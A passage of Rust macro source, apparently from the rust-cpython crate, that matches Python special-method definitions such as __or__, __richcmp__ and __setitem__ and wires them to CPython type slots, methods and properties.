{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_iternext: $crate::py_class_unary_slot!($class::__next__, *mut $crate::_detail::ffi::PyObject, $crate::py_class::slots::IterNextResultConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __next__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __next__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __next__" }
};
{ { def __nonzero__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__nonzero__ is not supported by py_class!; use the Python 3 spelling __bool__ instead." }
};
{ { def __or__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_or: $crate::py_class_numeric_slot!(binary $class::__or__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __or__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __or__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __or__" }
};
{ { def __pos__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_positive: $crate::py_class_unary_slot!($class::__pos__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __pos__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __pos__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __pos__" }
};
{ { def __pow__($left:ident, $right:ident, $ex:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_power: $crate::py_class_numeric_slot!(ternary $class::__pow__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __pow__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } { $ex : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __pow__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for ternary numeric operator __pow__" }
};
{ { def __radd__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __radd__ is not supported by py_class! Use __add__ instead!" }
};
{ { def __rand__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rand__ is not supported by py_class! Use __and__ instead!" }
};
{ { def __rdiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rdiv__ is not supported by py_class! Use __div__ instead!" }
};
{ { def __rdivmod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rdivmod__ is not supported by py_class! Use __divmod__ instead!" }
};
{ { def __repr__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_repr: $crate::py_class_unary_slot!($class::__repr__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PythonObjectCallbackConverter::<$crate::PyString>(std::marker::PhantomData)),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __repr__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __repr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __repr__" }
};
{ { def __rfloordiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rfloordiv__ is not supported by py_class! Use __floordiv__ instead!" }
};
{ { def __richcmp__(&$slf:ident, $other:ident : Option<&$other_name:ty>, $op:ident : $op_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_richcompare: $crate::py_class_richcompare_slot!($class::__richcmp__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __richcmp__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} } { $op : $op_name = {} }] }
}
$members $props
}};
{ { def __richcmp__(&$slf:ident, $other:ident : &$other_name:ty, $op:ident : $op_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_richcompare: $crate::py_class_richcompare_slot!($class::__richcmp__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __richcmp__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} } { $op : $op_name = {} }] }
}
$members $props
}};
{ { def __richcmp__(&$slf:ident, $other:ident : $other_name:ty, $op:ident : $op_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_richcompare: $crate::py_class_richcompare_slot!($class::__richcmp__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __richcmp__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} } { $op : $op_name = {} }] }
}
$members $props
}};
{ { def __richcmp__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __richcmp__" }
};
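    // A hedged sketch of the signature these __richcmp__ arms accept inside
    // py_class! (the class name, the `other` type, and the body are assumed
    // for illustration; the `op` parameter carries the requested comparison):
    //
    //     def __richcmp__(&self, other: &MyType, op: CompareOp) -> PyResult<bool> {
    //         ...
    //     }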
{ { def __rlshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rlshift__ is not supported by py_class! Use __lshift__ instead!" }
};
{ { def __rmatmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rmatmul__ is not supported by py_class! Use __matmul__ instead!" }
};
{ { def __rmod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rmod__ is not supported by py_class! Use __mod__ instead!" }
};
{ { def __rmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rmul__ is not supported by py_class! Use __mul__ instead!" }
};
{ { def __ror__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __ror__ is not supported by py_class! Use __or__ instead!" }
};
{ { def __round__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__round__ is not supported by py_class! yet." }
};
{ { def __rpow__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rpow__ is not supported by py_class! Use __pow__ instead!" }
};
{ { def __rrshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rrshift__ is not supported by py_class! Use __rshift__ instead!" }
};
{ { def __rshift__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_rshift: $crate::py_class_numeric_slot!(binary $class::__rshift__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __rshift__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __rshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __rshift__" }
};
{ { def __rsub__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rsub__ is not supported by py_class! Use __sub__ instead!" }
};
{ { def __rtruediv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rtruediv__ is not supported by py_class! Use __truediv__ instead!" }
};
{ { def __rxor__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Reflected numeric operator __rxor__ is not supported by py_class! Use __xor__ instead!" }
};
{ { def __set__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__set__ is not supported by py_class! yet." }
};
{ { def __setattr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__setattr__ is not supported by py_class! yet." }
};
{ { def __setitem__(&$slf:ident, $key:ident : Option<&$key_name:ty>, $value:ident : $value_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: {},
sdi_delitem: $sdi_delitem_slot_value:tt,
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: { $crate::py_class_ternary_slot!($class::__setitem__, [Option<&$key_name>], $value_name, $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
sdi_delitem: $sdi_delitem_slot_value,
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __setitem__(&$slf,) $res_type; { $($body)* } [{ $key : Option<&$key_name> = {} } { $value : $value_name = {} }] }
}
$members $props
}};
{ { def __setitem__(&$slf:ident, $key:ident : &$key_name:ty, $value:ident : $value_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: {},
sdi_delitem: $sdi_delitem_slot_value:tt,
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: { $crate::py_class_ternary_slot!($class::__setitem__, [&$key_name], $value_name, $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
sdi_delitem: $sdi_delitem_slot_value,
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __setitem__(&$slf,) $res_type; { $($body)* } [{ $key : &$key_name = {} } { $value : $value_name = {} }] }
}
$members $props
}};
{ { def __setitem__(&$slf:ident, $key:ident : $key_name:ty, $value:ident : $value_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: {},
sdi_delitem: $sdi_delitem_slot_value:tt,
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: { $crate::py_class_ternary_slot!($class::__setitem__, [$key_name], $value_name, $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
sdi_delitem: $sdi_delitem_slot_value,
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __setitem__(&$slf,) $res_type; { $($body)* } [{ $key : $key_name = {} } { $value : $value_name = {} }] }
}
$members $props
}};
{ { def __setitem__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __setitem__" }
};
{ { def __str__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_str: $crate::py_class_unary_slot!($class::__str__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PythonObjectCallbackConverter::<$crate::PyString>(std::marker::PhantomData)),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __str__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __str__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __str__" }
};
{ { def __sub__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_subtract: $crate::py_class_numeric_slot!(binary $class::__sub__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __sub__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __sub__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __sub__" }
};
{ { def __subclasscheck__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__subclasscheck__ is not supported by py_class! yet." }
};
{ { def __truediv__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_true_divide: $crate::py_class_numeric_slot!(binary $class::__truediv__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __truediv__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __truediv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __truediv__" }
};
{ { def __xor__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_xor: $crate::py_class_numeric_slot!(binary $class::__xor__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __xor__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __xor__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __xor__" }
};
{ { $(#[doc=$doc:expr])* def $name:ident (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $name(&$slf,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_instance_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])* $visibility:vis def $name:ident (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $name(&$slf,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_instance_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])* def $name:ident (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, $name(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_instance_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])* $visibility:vis def $name:ident (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, $name(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_instance_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod def $name:ident ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $name($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_class_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod $visibility:vis def $name:ident ($cls:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, $name($cls: &$crate::PyType,) $res_type; { $($body)* } [] }
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_class_class_method!{$py, $class::$name, { concat!($($doc, "\n"),*) } []};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod def $name:ident ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, $name($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_class_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])*@classmethod $visibility:vis def $name:ident ($cls:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, $name($cls: &$crate::PyType,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name = $crate::py_argparse_parse_plist_impl!{py_class_class_method {$py, $class::$name, { concat!($($doc, "\n"),*) }} [] ($($p)+,)};
} $props
}};
{ { $(#[doc=$doc:expr])* @staticmethod def $name:ident ($($p:tt)*) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist!{
py_class_impl_item { $class, $py, pub, $name() $res_type; { $($body)* } }
($($p)*)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name =
$crate::py_argparse_parse_plist!{
py_class_static_method {$py, $class::$name, {
concat!($($doc, "\n"),*)
} }
($($p)*)
}
;
} $props
}};
{ { $(#[doc=$doc:expr])* @staticmethod $visibility:vis def $name:ident ($($p:tt)*) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist!{
py_class_impl_item { $class, $py, $visibility, $name() $res_type; { $($body)* } }
($($p)*)
}
}
/* members: */ {
$( $member_name = $member_expr; )*
$name =
$crate::py_argparse_parse_plist!{
py_class_static_method {$py, $class::$name, {
concat!($($doc, "\n"),*)
} }
($($p)*)
}
;
} $props
}};
{ { static $name:ident = $init:expr; $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt $impls:tt
{ $( $member_name:ident = $member_expr:expr; )* } $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots $impls
/* members: */ {
$( $member_name = $member_expr; )*
$name = $init;
} $props
}};
{ { $(#[doc=$doc:expr])* @property def $name:ident(&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $name(&$slf,) $res_type; { $($body)* } [] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
{ concat!($($doc, "\n"),*) } $name: $res_type,
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
]
}
}};
{ { @$name:ident.setter def $setter_name:ident(&$slf:ident, $value:ident : Option<Option<&$value_type:ty>> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<Option<&$value_type>> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ Option<&$value_type> ] => $setter_name,
]
}
}};
{ { @$name:ident.setter def $setter_name:ident(&$slf:ident, $value:ident : Option<&$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<&$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
[ $( $prop_setter_name : $prop_setter_value_type => $prop_setter_setter, )*
$name : [ &$value_type ] => $setter_name,
]
}
}};
{ { @$name:ident.setter def $setter_name:ident(&$slf:ident, $value:ident : Option<$value_type:ty> ) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt $slots:tt
{ $( $imp:item )* }
$members:tt
{ [ $( $prop_doc:tt $prop_getter_name:ident: $prop_type:ty, )* ]
[ $( $prop_setter_name:ident : $prop_setter_value_type:tt => $prop_setter_setter:ident, )* ] }
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info $slots
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, $setter_name(&$slf,) $res_type; { $($body)* } [{ $value: Option<$value_type> = {} }] }
}
$members
/* props: */ {
[ $( $prop_doc $prop_getter_name: $prop_type, )*
]
